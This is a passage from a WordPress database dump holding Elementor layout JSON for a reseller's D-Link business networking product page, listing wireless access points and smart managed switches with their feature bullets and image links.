802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":25},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3597,2658,'_elementor_version','0.4'),(3600,2659,'_wp_page_template','template-fullwidth.php'),(3601,2659,'_elementor_edit_mode','builder'),(3602,2659,'_elementor_template_type','post'),(3603,2659,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>- Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>- Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>- Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>- Provides WLAN partitioning for deployments such as wireless hot spots<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>\\u2022 Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>\\u2022 Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>\\u2022 Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>\\u2022 Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>\\u2022 Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>\\u2022 Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>\\u2022 Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>\\u2022 Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet 